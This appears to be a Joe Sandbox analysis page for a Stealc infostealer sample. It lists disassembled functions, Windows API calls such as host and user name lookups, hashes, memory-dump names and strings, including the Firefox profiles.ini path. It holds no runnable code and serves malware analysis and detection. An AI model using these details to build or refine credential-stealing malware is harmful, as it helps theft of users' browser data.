Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c48ed9cb883bd67e5bd98c58a96e9dbd98c17f46c9dd9052e0e271223015f63a
Instruction ID: efe5911f65ae80d27e15a97370333e543d373a40a02b766223767f20bc17f2f2
Opcode Fuzzy Hash: c48ed9cb883bd67e5bd98c58a96e9dbd98c17f46c9dd9052e0e271223015f63a
Instruction Fuzzy Hash: 84F01570C01218EBCB04EFA4E9596DCBB74EB10360F508299E826672C0DB385A5AEF81

Function 00F28DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 1140a9adb37a7d3e8759502a1d1002f88b1cb71aa9459b651ec96e5aa3868348
Instruction ID: d1815b5d0f83a100a2accb6b1505eb343d45e78a69b69932c8f9f22b116ce6ef
Opcode Fuzzy Hash: 1140a9adb37a7d3e8759502a1d1002f88b1cb71aa9459b651ec96e5aa3868348
Instruction Fuzzy Hash: E7E01A31A4035CBBDB91EB90DC96FAE777C9B44B01F004295BA0C5B1C0DE74AB868B91

Function 00F11190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F278E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F26A2B), ref: 00F27910
Part of subcall function 00F278E0: HeapAlloc.KERNEL32(00000000,?,?,?,00F26A2B), ref: 00F27917
Part of subcall function 00F278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F2792F

Part of subcall function 00F27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27880
Part of subcall function 00F27850: HeapAlloc.KERNEL32(00000000,?,?,?,00F111B7), ref: 00F27887
Part of subcall function 00F27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F2789F

ExitProcess.KERNEL32 ref: 00F111C6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 651686d62ac559c2a83600b9662f8c1d4aee801a112e3b7ef7db998378fe7a1b
Instruction ID: 656476aef1859d96b4d2c354b2d8b6ca809fce4477cb28a7c32643e3876a7283
Opcode Fuzzy Hash: 651686d62ac559c2a83600b9662f8c1d4aee801a112e3b7ef7db998378fe7a1b
Instruction Fuzzy Hash: F0E012B5D54311A3CB1473B0BC0BB6A369C6F14389F140534FA15D3102FE2DF841AA65

Function 00F19880 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,00F20759,?,?), ref: 00F19888

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 3874298ff2daca6341146f2633bf21ee6d8d4b3d082d1d56428fdb48fab58926
Instruction ID: a818f6aed3eee52cd4673f22fbfa3f5ffd1cc69af8aea53e4909075341fb661c
Opcode Fuzzy Hash: 3874298ff2daca6341146f2633bf21ee6d8d4b3d082d1d56428fdb48fab58926
Instruction Fuzzy Hash: 2EF054B5D00208FBDB00EFA4D846BDDB7B4EB08300F104494E90597281E6709B55DB91

Non-executed Functions

Function 6BF9D320 Relevance: 165.2, APIs: 67, Strings: 27, Instructions: 662threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D34D

Part of subcall function 6BF75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BF756EE,?,00000001), ref: 6BF75B85
Part of subcall function 6BF75B50: EnterCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75B90
Part of subcall function 6BF75B50: LeaveCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75BD8
Part of subcall function 6BF75B50: GetTickCount64.KERNEL32 ref: 6BF75BE4

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF9D375
GetCurrentThreadId.KERNEL32 ref: 6BF9D517
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D51F
GetCurrentThreadId.KERNEL32 ref: 6BF9D54D
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D555
GetCurrentThreadId.KERNEL32 ref: 6BF9D583
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D58B
GetCurrentThreadId.KERNEL32 ref: 6BF9D5B9
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D5C1
GetCurrentThreadId.KERNEL32 ref: 6BF9D5EF
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D5F7
GetCurrentThreadId.KERNEL32 ref: 6BF9D626
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D62E
GetCurrentThreadId.KERNEL32 ref: 6BF9D65D
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D665
GetCurrentThreadId.KERNEL32 ref: 6BF9D694
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D69C
GetCurrentThreadId.KERNEL32 ref: 6BF9D6CB
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D6D3
GetCurrentThreadId.KERNEL32 ref: 6BF9D702
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D70A
GetCurrentThreadId.KERNEL32 ref: 6BF9D739
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D741
GetCurrentThreadId.KERNEL32 ref: 6BF9D770
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D778
GetCurrentThreadId.KERNEL32 ref: 6BF9D7A7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D7AF
GetCurrentThreadId.KERNEL32 ref: 6BF9D7DE
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D7E6
GetCurrentThreadId.KERNEL32 ref: 6BF9D815
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D81D
GetCurrentThreadId.KERNEL32 ref: 6BF9D84C
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D854
GetCurrentThreadId.KERNEL32 ref: 6BF9D883
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D88B
GetCurrentThreadId.KERNEL32 ref: 6BF9D8BA
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D8C2
GetCurrentThreadId.KERNEL32 ref: 6BF9D8F1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D8F9
GetCurrentThreadId.KERNEL32 ref: 6BF9D928
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D930
GetCurrentThreadId.KERNEL32 ref: 6BF9D95F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D967
moz_xmalloc.MOZGLUE(00000050), ref: 6BF9DAAD
GetCurrentThreadId.KERNEL32 ref: 6BF9DB6B
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9DB73
GetCurrentThreadId.KERNEL32 ref: 6BF9DBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF9DBE9
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D37D

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

GetCurrentThreadId.KERNEL32 ref: 6BF9D3A0
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D3A8
GetCurrentThreadId.KERNEL32 ref: 6BF9D3EC
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D3F4
GetCurrentThreadId.KERNEL32 ref: 6BF9D42E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D436
GetCurrentThreadId.KERNEL32 ref: 6BF9D475
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D47D
GetCurrentThreadId.KERNEL32 ref: 6BF9D4AB
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D4B3
GetCurrentThreadId.KERNEL32 ref: 6BF9D4E1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D4E9
?EnsureBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF9D9A3
moz_xmalloc.MOZGLUE(000001A8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BF9DA09
free.MOZGLUE(6BFCFEF3), ref: 6BF9DA8A
?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(6BFACCB0,6BFACC90), ref: 6BF9DB1D
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BF9DC5D

Strings

[I %d/%d] - capacity = %d, xrefs: 6BF9D3B4
[I %d/%d] locked_profiler_start, xrefs: 6BF9D385
nativeallocations, xrefs: 6BF9D747
cpuallthreads, xrefs: 6BF9D85A
noiostacks, xrefs: 6BF9D5C7
unregisteredthreads, xrefs: 6BF9D8FF
mainthreadio, xrefs: 6BF9D525
leaf, xrefs: 6BF9D4EF
power, xrefs: 6BF9D96D
processcpu, xrefs: 6BF9D936
fileio, xrefs: 6BF9D55B
jsallocations, xrefs: 6BF9D6A2
markersallthreads, xrefs: 6BF9D8C8
samplingallthreads, xrefs: 6BF9D891
fileioall, xrefs: 6BF9D591
[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BF9DBF2
seqstyle, xrefs: 6BF9D634
audiocallbacktracing, xrefs: 6BF9D7B5
notimerresolutionchange, xrefs: 6BF9D823
stackwalk, xrefs: 6BF9D66B
screenshots, xrefs: 6BF9D5FD
nostacksampling, xrefs: 6BF9D6D9
ipcmessages, xrefs: 6BF9D77E
preferencereads, xrefs: 6BF9D710
[I %d/%d] - feature = %s, xrefs: 6BF9D48A, 6BF9D4C0, 6BF9D4F6, 6BF9D52C, 6BF9D562, 6BF9D598, 6BF9D5CE, 6BF9D604, 6BF9D63B, 6BF9D672, 6BF9D6A9, 6BF9D6E0, 6BF9D717, 6BF9D74E, 6BF9D785, 6BF9D7BC, 6BF9D7F3, 6BF9D82A, 6BF9D861, 6BF9D898, 6BF9D8CF, 6BF9D906, 6BF9D93D, 6BF9D974
java, xrefs: 6BF9D483
[I %d/%d] - threads = %s, xrefs: 6BF9DB7F

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Thread$Current_getpid$getenv$CriticalEnterSectionmoz_xmalloc$??1ios_base@std@@BufferCount64CounterEnsureExit@mozilla@@Init_thread_footerLabelLeaveMainMarker@base_profiler_markers_detail@mozilla@@Now@PerformanceProfilerQueryRegisterStamp@mozilla@@TickTimeV12@___acrt_iob_func__stdio_common_vfprintffree
String ID: [I %d/%d] - capacity = %d$[I %d/%d] - feature = %s$[I %d/%d] - threads = %s$[I %d/%d] locked_profiler_save_profile_to_file(%s)$[I %d/%d] locked_profiler_start$audiocallbacktracing$cpuallthreads$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 924678828-2027714185
Opcode ID: 57ac481ae011b8f6da52e81282137517dc8dbf3735d8f5b5407037abf67306c7
Instruction ID: 8733a27c9279e3c4c90a11b1e50b8119e3fabadcadea85f36541121cc415d999
Opcode Fuzzy Hash: 57ac481ae011b8f6da52e81282137517dc8dbf3735d8f5b5407037abf67306c7
Instruction Fuzzy Hash: 0432D57B9142025FFB117FB8A415B6AB7A5EF86208F158848EE4597273DF3EC409C722

Function 6BF8D9B0 Relevance: 127.4, APIs: 40, Strings: 32, Instructions: 1361stringtimeCOMMON

Download Yara Rule

APIs

?IsEafPlusEnabled@mozilla@@YA_NXZ.MOZGLUE ref: 6BF8D9CD

Part of subcall function 6BF60DE0: GetCurrentProcess.KERNEL32 ref: 6BF60DFE

?CacheNtDllThunk@mozilla@@YAXXZ.MOZGLUE ref: 6BF8D9D6

Part of subcall function 6BF8F2B0: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF8D9DB), ref: 6BF8F2D2
Part of subcall function 6BF8F2B0: GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BF8F2F5
Part of subcall function 6BF8F2B0: moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BF8F347
Part of subcall function 6BF8F2B0: moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BF8F386

Part of subcall function 6BF8CBE8: GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
Part of subcall function 6BF8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

Part of subcall function 6BF5EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6BF5EBB5
Part of subcall function 6BF5EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BF8D7F3), ref: 6BF5EBC3
Part of subcall function 6BF5EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BF8D7F3), ref: 6BF5EBD6

Part of subcall function 6BF614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6BF61248,6BF61248,?), ref: 6BF614C9
Part of subcall function 6BF614B0: memcpy.VCRUNTIME140(?,6BF61248,00000000,?,6BF61248,?), ref: 6BF614EF

Part of subcall function 6BF5EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6BF5EEE3

moz_xmalloc.MOZGLUE(00000018), ref: 6BF8D9DD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,00000000), ref: 6BF8DA00
memset.VCRUNTIME140(?,00000000,00000110,?,00000000), ref: 6BF8DA37
VerSetConditionMask.NTDLL ref: 6BF8DA64
VerSetConditionMask.NTDLL ref: 6BF8DA70
VerSetConditionMask.NTDLL ref: 6BF8DA77
VerSetConditionMask.NTDLL ref: 6BF8DA7E
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BF8DA8C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6BFD1A81,00000002,0000000E), ref: 6BF8DE11
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,marionette,?,?,?,?,?,?,00000000), ref: 6BF8DE39
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6BFD1A81,00000002), ref: 6BF8DE74
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF8DECB
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 6BF8DF3A
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_SAFE_MODE_RESTART), ref: 6BF8DF53
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_SILENT_START,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF8DF6E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_RESET_PROFILE_RESTART,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF8DF89
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_HEADLESS,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF8DFA4
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(XRE_PROFILE_PATH,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF8DFBF
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_SKELETON_UI_RESTARTING), ref: 6BF8DFDE
free.MOZGLUE(00000000), ref: 6BF8E051
moz_xmalloc.MOZGLUE(0000000C), ref: 6BF8E17C
GetModuleHandleW.KERNEL32(00000000), ref: 6BF8E1E3

Part of subcall function 6BF61460: free.MOZGLUE(?,?,?,6BF8D859), ref: 6BF61490
Part of subcall function 6BF61460: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BF8D859), ref: 6BF614A9

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BF8E706
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BF8E71A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BF8E732

Part of subcall function 6BF5F100: LoadLibraryW.KERNEL32(shell32,?,6BFCD020), ref: 6BF5F122
Part of subcall function 6BF5F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BF5F132

??0ios_base@std@@IAE@XZ.MSVCP140(\Mozilla\Firefox\profiles.ini,0000001D,00000000), ref: 6BF8E80D
?fail@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6BF8E852
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BF8E91E

Strings

MOZ_HEADLESS, xrefs: 6BF8DF9F
, xrefs: 6BF8ED53
|Flags, xrefs: 6BF8EB63
marionette, xrefs: 6BF8DD6C, 6BF8DE33
MOZ_SKELETON_UI_RESTARTING, xrefs: 6BF8DFD9
|Enabled, xrefs: 6BF8E129
3*+, xrefs: 6BF8EC45
|CssToDevPixelScaling, xrefs: 6BF8E496
\Mozilla\Firefox\profiles.ini, xrefs: 6BF8E7E6
|Progress, xrefs: 6BF8DB54
|SpringsCSSSpan, xrefs: 6BF8E661
MAB, xrefs: 6BF8EC5F
|UrlbarCSSSpan, xrefs: 6BF8E54D
|Height, xrefs: 6BF8E3C6
|ScreenY, xrefs: 6BF8E2EC
